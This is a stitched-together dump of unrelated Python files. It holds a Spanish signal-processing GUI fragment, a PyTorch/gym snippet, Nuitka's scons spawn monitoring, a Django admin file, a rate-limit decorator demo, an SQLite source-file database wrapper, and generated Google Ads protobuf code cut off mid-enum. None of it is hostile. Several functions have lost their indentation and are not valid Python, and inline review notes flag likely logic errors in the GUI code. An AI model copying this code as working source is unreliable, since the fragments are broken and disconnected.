    # Pad h(n) on the right with 0's if x(n) has more right elements
    for i in range(len(xRAux) - len(hRAux)):
        newH.append(float(0))
    for i in range(len(newH)-len(puntosEjeH)):
        puntosEjeH.append(i+1)
    # Convert the x entry fragments to floats, skipping empty fields
    xls = []
    xrs = []
    for i in xLAux:
        if i != '':
            xls.append(float(i))
    for i in xRAux:
        if i != '':
            xrs.append(float(i))
    # Convert the h entry fragments to floats, skipping empty fields
    hls = []
    hrs = []
    for i in hLAux:
        if i != '':
            hls.append(float(i))
    for i in hRAux:
        if i != '':
            hrs.append(float(i))
    # Start index for x: negative count of left-side elements
    indice_x = 0
    if len(xLAux) > 0:
        if xLAux[0] != '':
            indice_x = -len(xLAux)
    indice_h = 0
    # NOTE(review): this tests xRAux but sets indice_h from hLAux — it
    # probably should test hLAux; confirm against the GUI behavior.
    if len(xRAux) > 0:
        if xRAux[0] != '':
            indice_h = -len(hLAux)
    print(xls)
    print(xrs)
    xn = SenalDiscreta(xls + [float(xO.get())] + xrs, indice_x, xesperiodica.get())
    hn = SenalDiscreta(hls + [float(hO.get())] + hrs, indice_h, hesperiodica.get())
    xn.empatar(hn)
    return [xn, hn]
"""
Para las operaciones que solo requieran una secuencia de
entrada, entonces se utiliza esta funcion, ya que esta
no necesita ser acompletada con 0´s
"""
def concatenarSecuenciaX():
'''Hace las listas correspondientes a x(n) y h(n) del mismo tamaño y las asigna newX y newH así como prepara los puntos en el eje horizontal de las gráficas para su posterior ploteo
Returns:
SenialDiscreta:Devuelve una tupla con objetos de SenialDiscreta que representan a x(n) (posición: 0) y h(n) (posición: 1)
'''
global puntosEjeH,newX
#la funcion split sirve para separar
#la cadena cada vez que hay un
#determinado caracter, aqui en es las ","
xLAux = xL.get().split(",")
xRAux = xR.get().split(",")
# Se resetea newX, newH y puntosEjeH
newX = []
puntosEjeH = []
for elemento in xLAux:
if elemento != "":
newX.append(float(elemento))
else:
newX.append(float(0))
newX.append(float(xO.get()))
#Para guardar el origen se cuenta desde
#el, y se cuentan la cantidad de elementos
#a la izquierda etiquetandolos como se
#encontrarian en la grafica
for i in range(len(newX)):
puntosEjeH.append(i*(-1))
#el arreglo se invierte debido a que en el
#arreglo tenemos 0,-1,-2 por ejemplo, y se
#debe de invertir para que quede como en una
#grafica normal
puntosEjeH.reverse()
for elemento in xRAux:
if elemento != "":
newX.append(float(elemento))
else:
newX.append(float(0))
for i in range(len(newX)-len(puntosEjeH)):
puntosEjeH.append(i+1)
xn = SenalDiscreta(newX, -len(xLAux), xesperiodica.get())
return [xn]
def desplazar():
    """
    Command bound to the "Desplazamiento" (shift) button.
    NOTE(review): this redefinition replaces the earlier desplazar() above
    at import time; this is the version the GUI actually calls.
    """
    global newX,newX2,puntosEjeH
    # Fills newX2 (original) and newX (shifted) as side effects
    obtenerDesplazamiento()
    # Perform the operation
    operacion = "Desplazar"
    # Configure the GUI (newX2 = original sequence, newX = shifted one)
    configurarPantallaDeUnSoloValor(operacion, newX2,newX)
    # Plot
    graficarSoloUna(puntosEjeH, newX, operacion)
    ventana.mainloop()
def obtenerDesplazamiento():
    """
    Reads x(n) from the GUI, keeps a copy of the original sequence in the
    global newX2 and builds the shifted sequence in the global newX,
    padding with 0's according to udsDesplazamiento (negative = left,
    positive = right). Also rebuilds the global puntosEjeH axis points.
    """
    global puntosEjeH,newX,newX2
    # split() separates the entry string at every ","
    xLAux = xL.get().split(",")
    xRAux = xR.get().split(",")
    # newX2 keeps the unshifted sequence for display
    newX2 = []
    for elemento in xLAux:
        if elemento != "":
            newX2.append(float(elemento))
        else:
            newX2.append(float(0))
    newX2.append(float(xO.get()))
    for elemento in xRAux:
        if elemento != "":
            newX2.append(float(elemento))
        else:
            newX2.append(float(0))
    # Pad the raw fragments according to the shift direction.
    # NOTE(review): for a negative shift, range(negative) is empty, so
    # this left-padding loop never runs — confirm whether the later
    # newX reverse/pad block is meant to compensate for that.
    if udsDesplazamiento.get()<0:
        xLAux.reverse()
        for i in range(udsDesplazamiento.get()):
            xLAux.append(float(0))
        xLAux.reverse()
    else:
        for i in range(udsDesplazamiento.get()):
            xRAux.append(float(0))
    # Reset newX and puntosEjeH
    newX = []
    puntosEjeH = []
    #int(udsDesplazamiento.get())
    for elemento in xLAux:
        if elemento != "":
            newX.append(float(elemento))
        else:
            newX.append(float(0))
    newX.append(float(xO.get()))
    # Count from the origin, labeling the elements to the left the way
    # they would appear on the graph (offset by the shift amount)
    for i in range(len(newX)+udsDesplazamiento.get()):
        puntosEjeH.append(i*(-1))
    # Reverse so 0,-1,-2 reads like a normal graph axis
    puntosEjeH.reverse()
    for elemento in xRAux:
        if elemento != "":
            newX.append(float(elemento))
        else:
            newX.append(float(0))
    # For left shifts, pad the front of newX with 0's
    if udsDesplazamiento.get()<0:
        newX.reverse()
        for i in range((udsDesplazamiento.get()*(-1))-2):
            newX.append(float(0))
        newX.reverse()
    for i in range(len(newX)-len(puntosEjeH)):
        puntosEjeH.append(i+1)
def graficarSoloUna(puntosEjeH, resultado, operacion):
    """Stem-plot a single sequence *resultado* at positions *puntosEjeH*."""
    plt.suptitle(operacion + ' x(n)')
    plt.stem(puntosEjeH, resultado, '-.')
    # Draw both axes through the origin for readability
    pyplot.axhline(0, color="black")
    pyplot.axvline(0, color="black")
    plt.ylabel('x(n)')
    plt.show()
def graficar(puntosEjeH, newX, newH, resultado, operacion):
    """
    Stem-plot x(n), h(n) and the result g(n) in three stacked subplots.

    All four sequence arguments must have the same number of elements;
    *puntosEjeH* gives the shared horizontal positions.
    """
    # x(n) on top, h(n) in the middle
    for posicion, serie, etiqueta in ((311, newX, 'x(n)'), (312, newH, 'h(n)')):
        plt.subplot(posicion)
        plt.stem(puntosEjeH, serie, '-.')
        pyplot.axhline(0, color="black")
        pyplot.axvline(0, color="black")
        plt.ylabel(etiqueta)
    # g(n) in the third position
    plt.subplot(313)
    markerline, stemlines, baseline = plt.stem(puntosEjeH, resultado, '-.')
    plt.suptitle(operacion + ' x(n) con h(n)')
    plt.setp(baseline)
    plt.ylabel('g(n)')
    pyplot.axhline(0, color="black")
    pyplot.axvline(0, color="black")
    plt.show()
"""
Necesitaba una grafica personalizada para el reflejo,
probablemente se puede reutilizar codigo, pero por
cuestiones practicas no lo hice
"""
def graficarReflejo(puntosEjeH,ejeX,ejeY,operacion):
#puntosEjeH se refiere al eje vertical
#Los 4 arreglos deben de tener la misma cantida
#de elementos
#h(n) en la segunda posicion
plt.subplot(311)
markerline, stemlines, baseline = plt.stem(puntosEjeH, ejeX, '-.')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.ylabel('En X')
#g(n) en la tercer posicion
plt.subplot(313)
markerline, stemlines, baseline = plt.stem(puntosEjeH, ejeY, '-.')
# setting property of baseline with color red and linewidth 2
plt.suptitle(operacion+' x(n) en el eje X y Y')
plt.setp(baseline)
plt.ylabel('En Y')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.show()
# Plots only two graphs: the input sequence and the result.
def graficarSolo2(puntosEjeH, newX, resultado, operacion):
    """Stem-plot the input x(n) and the result g(n) in two stacked subplots."""
    # x(n) in the top subplot
    plt.subplot(311)
    plt.stem(puntosEjeH, newX, '-.')
    pyplot.axhline(0, color="black")
    pyplot.axvline(0, color="black")
    plt.ylabel('x(n)')
    # g(n) in the bottom subplot
    plt.subplot(313)
    markerline, stemlines, baseline = plt.stem(puntosEjeH, resultado, '-.')
    plt.suptitle(operacion + ' x(n) con algo')
    plt.setp(baseline)
    plt.ylabel('g(n)')
    pyplot.axhline(0, color="black")
    pyplot.axvline(0, color="black")
    plt.show()
def grabarGUI():
    """
    Records audio from the GUI, storing the resulting discrete signal in
    the global `senal` and updating the status label before and after.
    """
    estadoGrabacion.set("Grabando...")
    global senal
    senal = obtenerSenalDiscretaDesdeAudio()
    estadoGrabacion.set("Audio grabado")
# Script entry point: build the window, then show the start screen.
crearVentana()
verInicio()
|
'''
Source codes for Python Machine Learning By Example 3rd Edition (Packt Publishing)
Chapter 14 Making Decision in Complex Environments with Reinforcement Learning
Author: Yuxi (Hayden) Liu (yuxi.liu.ece@gmail.com)
'''
import torch
# Allocate an uninitialized 3x4 tensor; the printed values are arbitrary.
x = torch.empty(3, 4)
print(x)
from gym import envs
# Print every environment registered with gym.
print(envs.registry.all())
|
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Spawning processes.
This is to replace the standard spawn implementation with one that tracks the
progress, and gives warnings about things taking very long.
"""
import os
import sys
import threading
from nuitka.Tracing import my_print, scons_logger
from nuitka.utils.Execution import executeProcess
from nuitka.utils.Timing import TimerReport
from .SconsCaching import runClCache
from .SconsProgress import closeSconsProgressBar, updateSconsProgressBar
from .SconsUtils import decodeData
# Thread class to run a command
class SubprocessThread(threading.Thread):
    """Runs one command in a background thread, timing it and capturing
    its output, exit code, and any exception raised while executing."""

    def __init__(self, cmdline, env):
        threading.Thread.__init__(self)

        self.cmdline = cmdline  # command to execute
        self.env = env          # environment for the child process
        self.data = None        # stdout of the process, filled by run()
        self.err = None         # stderr of the process, filled by run()
        self.exit_code = None
        self.exception = None   # exception raised during execution, if any

        # Logs a report when the command takes longer than a minute;
        # "%" is doubled so the command text survives %-formatting.
        self.timer_report = TimerReport(
            message="Running %s took %%.2f seconds"
            % repr(self.cmdline).replace("%", "%%"),
            min_report_time=60,
            logger=scons_logger,
        )

    def run(self):
        try:
            # execute the command, queue the result
            with self.timer_report:
                self.data, self.err, self.exit_code = executeProcess(
                    command=self.cmdline, env=self.env
                )
        except Exception as e:  # will rethrow all, pylint: disable=broad-except
            self.exception = e

    def getProcessResult(self):
        # Returns (stdout, stderr, exit_code, exception).
        return self.data, self.err, self.exit_code, self.exception
def runProcessMonitored(cmdline, env):
    """Run *cmdline* on a worker thread, warning once if it runs past a minute.

    Returns the (stdout, stderr, exit_code, exception) tuple collected by
    the worker thread.
    """
    worker = SubprocessThread(cmdline, env)
    worker.start()

    # Give the command a minute of grace before complaining about slowness.
    worker.join(60)

    if worker.is_alive():
        scons_logger.info(
            "Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
            % worker.timer_report.getTimer().getDelta()
        )

    worker.join()

    updateSconsProgressBar()

    return worker.getProcessResult()
def _filterMsvcLinkOutput(env, module_mode, data, exit_code):
# Training newline in some cases, esp. LTO it seems.
data = data.rstrip()
if module_mode:
data = b"\r\n".join(
line
for line in data.split(b"\r\n")
if b" Creating library" not in line
# On localized compilers, the message to ignore is not as clear.
if not (module_mode and b".exp" in line)
)
# The linker will say generating code at the end, due to localization
# we don't know.
if env.lto_mode and exit_code == 0:
if len(data.split(b"\r\n")) == 2:
data = b""
if env.pgo_mode == "use" and exit_code == 0:
# Very spammy, partially in native language for PGO link.
data = b""
return data
# To work around Windows not supporting command lines of greater than 10K by
# default:
def getWindowsSpawnFunction(env, module_mode, source_files):
    """Create the spawn replacement used on Windows.

    Parameters:
        env: scons environment-like object (lto_mode/pgo_mode flags)
        module_mode (bool): True when linking a module
        source_files: source paths whose basenames cl.exe echoes and
            which should be filtered from the output

    Returns:
        A spawn function that executes commands, filters known-noise
        compiler/linker output and monitors for slow compilations.
    """
    def spawnWindowsCommand(
        sh, escape, cmd, args, os_env
    ):  # pylint: disable=unused-argument
        # The "del" appears to not work reliably, but is used with large amounts of
        # files to link. So, lets do this ourselves, plus it avoids a process
        # spawn.
        if cmd == "del":
            assert len(args) == 2
            os.unlink(args[1])
            return 0

        # For quoted arguments that end in a backslash, things don't work well
        # this is a workaround for it.
        def removeTrailingSlashQuote(arg):
            if arg.endswith(r"\""):
                return arg[:-1] + '\\"'
            else:
                return arg

        newargs = " ".join(removeTrailingSlashQuote(arg) for arg in args[1:])
        cmdline = cmd + " " + newargs

        # Special hook for clcache inline copy
        if cmd == "<clcache>":
            data, err, rv = runClCache(args, os_env)
        else:
            data, err, rv, exception = runProcessMonitored(cmdline, os_env)

            if exception:
                closeSconsProgressBar()
                raise exception

        if cmd == "link":
            data = _filterMsvcLinkOutput(
                env=env, module_mode=module_mode, data=data, exit_code=rv
            )
        elif cmd in ("cl", "<clcache>"):
            # Skip forced output from cl.exe (the first echoed line)
            data = data[data.find(b"\r\n") + 2 :]

            source_basenames = [
                os.path.basename(source_file) for source_file in source_files
            ]

            # cl.exe echoes each compiled source filename plus
            # "Generating Code..." — drop those lines and empty ones.
            def check(line):
                return line in (b"", b"Generating Code...") or line in source_basenames

            data = (
                b"\r\n".join(line for line in data.split(b"\r\n") if not check(line))
                + b"\r\n"
            )

        # Anything that survived filtering is unexpected and shown in yellow.
        if data is not None and data.rstrip():
            my_print("Unexpected output from this command:", style="yellow")
            my_print(cmdline, style="yellow")

            if str is not bytes:
                data = decodeData(data)

            my_print(data, style="yellow", end="")

        if err:
            if str is not bytes:
                err = decodeData(err)

            my_print(err, style="yellow", end="")

        return rv

    return spawnWindowsCommand
def _unescape(arg):
# Undo the damage that scons did to pass it to "sh"
arg = arg.strip('"')
slash = "\\"
special = '"$()'
arg = arg.replace(slash + slash, slash)
for c in special:
arg = arg.replace(slash + c, c)
return arg
def isIgnoredError(line):
    """Return True when *line* (bytes of stderr) is a known-harmless
    compiler/linker diagnostic that should be suppressed."""
    # Substrings from: Debian and self-compiled Python2 static libpython
    # LTO warnings, localized "make" noise on paths with spaces
    # (Bullseye), and the deeply buggy gcc LTO + debug info combination.
    noisy_fragments = (
        b"function `posix_tmpnam':",
        b"function `posix_tempnam':",
        b"the use of `tmpnam_r' is dangerous",
        b"the use of `tempnam' is dangerous",
        b"at Python/import.c",
        b"overriding recipe for target",
        b"ignoring old recipe for target",
        b"Error 1 (ignored)",
        b"Dwarf Error:",
    )
    if any(fragment in line for fragment in noisy_fragments):
        return True

    # Warnings attributed to CPython's own sources.
    if line.startswith((b"Objects/structseq.c:", b"Python/import.c:")):
        return True

    # Exact matches: import.c function context line, and Trusty's buggy
    # toolchain doing this with LTO.
    exact_lines = (
        b"In function 'load_next',",
        b"bytearrayobject.o (symbol from plugin): warning: memset used with "
        b"constant zero length parameter; this could be due to transposed "
        b"parameters",
    )
    return line in exact_lines
def subprocess_spawn(args):
    """Run a scons command through "sh" and echo non-ignored stderr lines."""
    sh, _cmd, args, env = args

    _stdout, stderr, exit_code = executeProcess(
        command=[sh, "-c", " ".join(args)], env=env
    )

    skip_current = False
    for stderr_line in stderr.splitlines():
        # An ignored error suppresses itself and the line that follows it.
        if skip_current:
            skip_current = False
        elif isIgnoredError(stderr_line):
            skip_current = True
        else:
            if str is not bytes:
                stderr_line = decodeData(stderr_line)
            my_print(stderr_line, style="yellow", file=sys.stderr)

    return exit_code
class SpawnThread(threading.Thread):
    """Worker thread that runs one spawned command and records its outcome."""

    def __init__(self, *args):
        threading.Thread.__init__(self)

        self.args = args

        # Report unusually long commands; the command text is %-escaped so
        # it cannot be mistaken for a format directive.
        command_text = " ".join(_unescape(arg) for arg in self.args[2])
        self.timer_report = TimerReport(
            message="Running %s took %%.2f seconds"
            % (command_text.replace("%", "%%"),),
            min_report_time=60,
            logger=scons_logger,
        )

        self.result = None
        self.exception = None

    def run(self):
        try:
            # execute the command, queue the result
            with self.timer_report:
                self.result = subprocess_spawn(self.args)
        except Exception as e:  # will rethrow all, pylint: disable=broad-except
            self.exception = e

    def getSpawnResult(self):
        return self.result, self.exception
def runSpawnMonitored(sh, cmd, args, env):
    """Spawn the command on a worker thread, warning when it runs long.

    Returns the (result, exception) pair collected by the worker.
    """
    worker = SpawnThread(sh, cmd, args, env)
    worker.start()

    # Allow a minute before warning for long compile time.
    worker.join(60)

    if worker.is_alive():
        scons_logger.info(
            "Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
            % worker.timer_report.getTimer().getDelta()
        )

        worker.join()

    updateSconsProgressBar()

    return worker.getSpawnResult()
def getWrappedSpawnFunction():
    """Produce a spawn function for scons that monitors command duration."""

    def spawnCommand(sh, escape, cmd, args, env):
        # signature needed towards Scons core, pylint: disable=unused-argument

        # Avoid using ccache on binary constants blob, not useful and not working
        # with old ccache.
        disable_ccache = (
            '"__constants_data.o"' in args or '"__constants_data.os"' in args
        )
        if disable_ccache:
            env = dict(env)
            env["CCACHE_DISABLE"] = "1"

        result, exception = runSpawnMonitored(sh, cmd, args, env)

        if exception:
            closeSconsProgressBar()
            raise exception

        return result

    return spawnCommand
def enableSpawnMonitoring(env, win_target, module_mode, source_files):
    """Install the monitored spawn handler appropriate for the platform."""
    if win_target:
        # Windows needs the dedicated spawn that filters cl.exe output.
        spawn = getWindowsSpawnFunction(
            env=env, module_mode=module_mode, source_files=source_files
        )
    else:
        spawn = getWrappedSpawnFunction()
    env["SPAWN"] = spawn
|
from django.contrib import admin
from .models import Post, Group
class PostAdmin(admin.ModelAdmin):
    """Admin configuration for Post: list columns, inline editing, search."""
    # Columns shown on the post changelist page.
    list_display = (
        'pk',
        'text',
        'pub_date',
        'author',
        'group',
    )
    # Allow editing the group directly from the changelist.
    list_editable = ('group',)
    # Full-text search over the post body.
    search_fields = ('text',)
    # Sidebar filter by publication date.
    list_filter = ('pub_date',)
    # Placeholder shown for empty values (Russian for "empty").
    empty_value_display = '-пусто-'


admin.site.register(Post, PostAdmin)
# Group uses the default ModelAdmin.
admin.site.register(Group)
|
#!/usr/bin/env python3
"""Example of a decorator that ensures a function cannot be run
more than once every n seconds, where n is passed to the decorator
as an argument.
From Reuven Lerner's "Practical Decorators" talk at PyCon 2019.
Reuven's courses, books, and newsletter are at https://lerner.co.il/
"""
import time
class CalledTooOftenError(Exception):
    """Raised when a rate-limited function is called again too soon."""
    pass


def once_per_n(n):
    """Decorator factory: allow the wrapped function at most once per *n* seconds.

    A call made before *n* seconds have elapsed since the last successful
    call raises CalledTooOftenError.
    """
    import functools

    def middle(func):
        # Timestamp of the last successful invocation; 0 means "never",
        # so the very first call is always allowed.
        last_invoked = 0

        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            nonlocal last_invoked
            elapsed_time = time.time() - last_invoked
            # Bug fix: compare against the configured window *n*, not the
            # previously hard-coded 60 seconds that ignored the argument.
            if elapsed_time < n:
                raise CalledTooOftenError(
                    f"Only {elapsed_time} seconds have passed; {n} required"
                )
            last_invoked = time.time()
            return func(*args, **kwargs)
        return wrapper
    return middle
if __name__ == "__main__":
    # Demo: slow_add takes ~3 seconds, so the second call below arrives
    # too soon after the first and raises CalledTooOftenError; the third
    # call is never reached.
    @once_per_n(5)
    def slow_add(a, b):
        """Add two numbers slowly (sleeps 3 seconds) to exercise the limiter."""
        time.sleep(3)
        return a + b

    print(slow_add(2, 2))
    print(slow_add(3, 3))
    print(slow_add(4, 4))
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright 2016 Eddie Antonio Santos <easantos@ualberta.ca>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
>>> db = Database()
>>> rev = '1b8f23c763d08130ec2081c35e7f9fe0d392d700'
>>> repo = Repository.create('github', 'example', 'mit', rev)
>>> ret = db.add_repository(repo)
>>> ret == repo
True
>>> source_a = SourceFile.create(repo, b'void 0;', 'index.js')
>>> ret = db.add_source_file(source_a)
>>> ret == source_a
True
>>> source_b = SourceFile.create(repo, b'void 0;', 'undefined.js')
>>> source_a != source_b
True
>>> ret = db.add_source_file(source_b)
Traceback (most recent call last):
...
miner_db.database.DuplicateFileError: duplicate file contents
>>> parsed = ParsedSource(source_a.hash, [], {})
>>> ret = db.add_parsed_source(parsed)
>>> parsed == ret
True
>>> db.set_failure(source_b.hash)
>>> db.get_source(source_a.hash)
b'void 0;'
>>> repo_b = Repository.create('github', 'example-2', None, 'master')
>>> ret = db.add_repository(repo_b)
>>> ret == repo_b
True
>>> repo_c, source_file = db.get_info(source_a.hash)
>>> repo_c == repo
True
>>> source_file.path
'index.js'
"""
import logging
import sqlite3
from contextlib import closing
from .datatypes import RepositoryID, Repository, SourceFile, ParsedSource
from .utils import is_hash
# Module-level logger.
logger = logging.getLogger(__name__)
class DuplicateFileError(Exception):
    """Signals that identical file contents are already stored."""

    def __init__(self, hash_):
        assert is_hash(hash_)
        super(DuplicateFileError, self).__init__("duplicate file contents")
        # Remember which content hash collided.
        self.hash = hash_
class SourceNotFoundError(Exception):
    """Signals that no stored source file matches the requested hash."""

    def __init__(self, hash_):
        assert is_hash(hash_)
        super(SourceNotFoundError, self).__init__("could not find source", hash_)
        # Keep the missing hash for callers that want to report it.
        self.hash = hash_
class Database:
    """
    Object-oriented wrapper for the sources and repository database.
    Because I like writing ORMs from scratch.
    """

    def __init__(self, connection=None, read_only=False):
        """Wrap an sqlite3 *connection* (defaults to a fresh in-memory DB).

        Unless *read_only* is set, WAL journaling is enabled and the schema
        is created when the database is empty.
        """
        if connection is None:
            # Fixed: logger.warn() is deprecated in favour of warning().
            logger.warning("Using in memory database!")
            self.conn = sqlite3.connect(':memory:')
        else:
            self.conn = connection
        if not read_only:
            self._set_wal()
            self._initialize_db()

    def _initialize_db(self):
        """Create all tables from schema.sql when the database is empty."""
        from path import Path
        SCHEMA_FILENAME = Path(__file__).parent / 'schema.sql'
        with open(SCHEMA_FILENAME, encoding='UTF-8') as schema_file:
            SCHEMA = schema_file.read()
        conn = self.conn
        if self._is_database_empty():
            with conn:
                conn.executescript(SCHEMA)

    def _set_wal(self):
        """
        Enable Write-Ahead-Logging (WAL). This allows for less lock contention
        when there is a writer and multiple readers.
        Use BEGIN IMMEDIATE TRANSACTION instead of a standard BEGIN
        TRANSACTION, or even worse, BEGIN EXCLUSIVE TRANSACTION.
        https://www.sqlite.org/wal.html
        """
        with closing(self.conn.cursor()) as cur:
            cur.execute('PRAGMA journal_mode=WAL')
            status, = cur.fetchone()
            # An in-memory database reports 'memory' instead of 'wal'.
            assert status in ('wal', 'memory')
        # Allow for IMMEDIATE transactions rather than DEFERRED.
        self.conn.isolation_level = 'IMMEDIATE'

    def _is_database_empty(self):
        """Return True when the database contains no tables at all."""
        with closing(self.conn.cursor()) as cur:
            cur.execute("SELECT COUNT(*) FROM sqlite_master WHERE type='table'")
            answer, = cur.fetchone()
        return int(answer) == 0

    def add_repository(self, repo):
        """
        Add a repository to the database.  Returns the same Repository.
        """
        assert isinstance(repo, Repository)
        with closing(self.conn.cursor()) as cur, self.conn:
            cur.execute(r"""
                INSERT INTO repository (owner, repo, license, revision)
                VALUES (?, ?, ?, ?);
            """, (repo.owner, repo.name, repo.license, repo.revision))
        return repo

    def add_source_file(self, source_file):
        """
        Add a brand new source file to the database.

        Raises DuplicateFileError when contents with the same hash already
        exist.
        """
        assert isinstance(source_file, SourceFile)
        try:
            with closing(self.conn.cursor()) as cur, self.conn:
                cur.execute(r"""
                    INSERT INTO source_file (hash, owner, repo, path, source)
                    VALUES (?, ?, ?, ?, ?);
                """, (source_file.hash, source_file.owner, source_file.name,
                      source_file.path, source_file.source))
        except sqlite3.IntegrityError:
            # A constraint violation means identical contents are already
            # stored; hide the sqlite detail from the caller's traceback.
            raise DuplicateFileError(source_file.hash) from None
        return source_file

    def get_info(self, file_hash):
        """
        Returns both the Repository AND the source file for *file_hash*.

        Raises SourceNotFoundError when the hash is unknown.
        """
        with closing(self.conn.cursor()) as cur:
            cur.execute("""
                SELECT owner, repo, license, revision, path, source
                FROM source_file JOIN repository USING (owner, repo)
                WHERE hash = ?
            """, (file_hash,))
            result = cur.fetchone()
        if result is None:
            # Bug fix: this previously raised with the undefined name
            # "hash_" (a NameError); the parameter here is file_hash.
            raise SourceNotFoundError(file_hash)
        # license_ avoids shadowing the builtin license().
        owner, repo, license_, revision, path, source = result
        # Source must always be in bytes to be safe, but if it's already
        # Unicode, return it in the one true encoding ;)
        source = source.encode('utf-8') if isinstance(source, str) else source
        repo_id = RepositoryID(owner, repo)
        repo_info = Repository(repo_id, license=license_, revision=revision)
        source_info = SourceFile(repo_id, file_hash, source, path)
        return repo_info, source_info

    def get_source(self, hash_):
        """
        Return the source code for the given SHA256 hash as a bytes object.
        It is up to the client to decode the bytes into the appropriate
        encoding.
        """
        assert is_hash(hash_)
        with closing(self.conn.cursor()) as cur:
            cur.execute('SELECT source FROM source_file WHERE hash = ?', (hash_,))
            result = cur.fetchone()
        if result is None:
            raise SourceNotFoundError(hash_)
        source, = result
        return source.encode('utf-8') if isinstance(source, str) else source

    def add_parsed_source(self, parsed_source):
        """
        Add the AST and tokens of the parsed source file.
        """
        assert isinstance(parsed_source, ParsedSource)
        with self.conn:
            self.conn.execute(r"""
                INSERT INTO parsed_source (hash, ast, tokens)
                VALUES (?, ?, ?)
            """, (parsed_source.hash, parsed_source.ast_as_json,
                  parsed_source.tokens_as_json))
        return parsed_source

    def set_failure(self, source_hash):
        """
        Record that the given source hash had a parsing error.
        """
        assert is_hash(source_hash)
        with self.conn:
            self.conn.execute(r"""INSERT INTO failure (hash) VALUES (?)""",
                              (source_hash,))
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v3/proto/enums/hotel_placeholder_field.proto
import sys
# Py2/3 shim: on Python 3 serialized descriptor text must be re-encoded
# to latin1 bytes; on Python 2 it is passed through unchanged.
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database used to register the generated descriptors below.
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
# Generated file descriptor built from the serialized
# hotel_placeholder_field.proto definition (do not edit by hand).
DESCRIPTOR = _descriptor.FileDescriptor(
  name='google/ads/googleads_v3/proto/enums/hotel_placeholder_field.proto',
  package='google.ads.googleads.v3.enums',
  syntax='proto3',
  serialized_options=_b('\n!com.google.ads.googleads.v3.enumsB\033HotelsPlaceholderFieldProtoP\001ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v3/enums;enums\242\002\003GAA\252\002\035Google.Ads.GoogleAds.V3.Enums\312\002\035Google\\Ads\\GoogleAds\\V3\\Enums\352\002!Google::Ads::GoogleAds::V3::Enums'),
  serialized_pb=_b('\nAgoogle/ads/googleads_v3/proto/enums/hotel_placeholder_field.proto\x12\x1dgoogle.ads.googleads.v3.enums\x1a\x1cgoogle/api/annotations.proto\"\xcd\x03\n\x19HotelPlaceholderFieldEnum\"\xaf\x03\n\x15HotelPlaceholderField\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x0f\n\x0bPROPERTY_ID\x10\x02\x12\x11\n\rPROPERTY_NAME\x10\x03\x12\x14\n\x10\x44\x45STINATION_NAME\x10\x04\x12\x0f\n\x0b\x44\x45SCRIPTION\x10\x05\x12\x0b\n\x07\x41\x44\x44RESS\x10\x06\x12\t\n\x05PRICE\x10\x07\x12\x13\n\x0f\x46ORMATTED_PRICE\x10\x08\x12\x0e\n\nSALE_PRICE\x10\t\x12\x18\n\x14\x46ORMATTED_SALE_PRICE\x10\n\x12\r\n\tIMAGE_URL\x10\x0b\x12\x0c\n\x08\x43\x41TEGORY\x10\x0c\x12\x0f\n\x0bSTAR_RATING\x10\r\x12\x17\n\x13\x43ONTEXTUAL_KEYWORDS\x10\x0e\x12\x0e\n\nFINAL_URLS\x10\x0f\x12\x15\n\x11\x46INAL_MOBILE_URLS\x10\x10\x12\x10\n\x0cTRACKING_URL\x10\x11\x12\x14\n\x10\x41NDROID_APP_LINK\x10\x12\x12\x18\n\x14SIMILAR_PROPERTY_IDS\x10\x13\x12\x10\n\x0cIOS_APP_LINK\x10\x14\x12\x14\n\x10IOS_APP_STORE_ID\x10\x15\x42\xf0\x01\n!com.google.ads.googleads.v3.enumsB\x1bHotelsPlaceholderFieldProtoP\x01ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v3/enums;enums\xa2\x02\x03GAA\xaa\x02\x1dGoogle.Ads.GoogleAds.V3.Enums\xca\x02\x1dGoogle\\Ads\\GoogleAds\\V3\\Enums\xea\x02!Google::Ads::GoogleAds::V3::Enumsb\x06proto3')
  ,
  dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
# Enum descriptor for HotelPlaceholderField: 22 values from
# UNSPECIFIED (0) through IOS_APP_STORE_ID (21).
_HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD = _descriptor.EnumDescriptor(
  name='HotelPlaceholderField',
  full_name='google.ads.googleads.v3.enums.HotelPlaceholderFieldEnum.HotelPlaceholderField',
  filename=None,
  file=DESCRIPTOR,
  values=[
    _descriptor.EnumValueDescriptor(
      name='UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='UNKNOWN', index=1, number=1,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='PROPERTY_ID', index=2, number=2,
      serialized_options=None,
      type=None),
